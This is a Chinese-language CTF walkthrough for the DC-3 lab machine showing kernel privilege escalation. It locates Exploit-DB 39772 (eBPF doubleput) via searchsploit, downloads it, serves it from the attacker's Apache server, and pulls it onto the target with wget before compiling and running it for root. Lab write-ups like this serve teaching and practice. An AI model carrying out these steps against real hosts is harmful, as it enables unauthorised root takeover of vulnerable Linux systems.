实验环境:DC-3靶机
搜索一下相关的漏洞利用脚本
┌──(rootkali)-[~]
└─# searchsploit ubuntu 16.04
这里选用一个 4.4.x 相对通用的提权方式(Privilege Escalation表示提权)。
路径在linux/local/39772.txt
,即/usr/share/exploitdb/exploits/linux/local/39772.txt
。
文本写的是漏洞产生的原因、描述和漏洞利用的方法,还附上了exp,就是最后一行的链接。
地址如下:
Proof of Concept:
https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
使用wget下载,出现404。
┌──(rootkali)-[~]
└─# wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
经查询,换到了一个新的地址:https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/tree/main/bin-sploits
┌──(rootkali)-[~]
└─# wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
根据前面/usr/share/exploitdb/exploits/linux/local/39772.txt
文件中提到的使用方式进行操作。
需要将exploit.tar上传到目标主机,并解压运行~
kali启动http服务,将exploit.tar文件复制到网站根目录。
┌──(rootkali)-[~]
└─# systemctl restart apache2
┌──(rootkali)-[~]
└─# cp 39772/exploit.tar /var/www/html
在目标机器上使用wget进行下载
www-data@DC-3:/var/www/html/templates/protostar$ wget http://192.168.10.146/exploit.tar
进入解压出来的目录
www-data@DC-3:/var/www/html/templates/protostar$ cd ebpf_mapfd_doubleput_exploit/
并按照39772.txt
文件中的方式进行操作。
</templates/protostar/ebpf_mapfd_doubleput_exploit$ ./compile.sh
</templates/protostar/ebpf_mapfd_doubleput_exploit$ ./doubleput
已经获取到了root权限。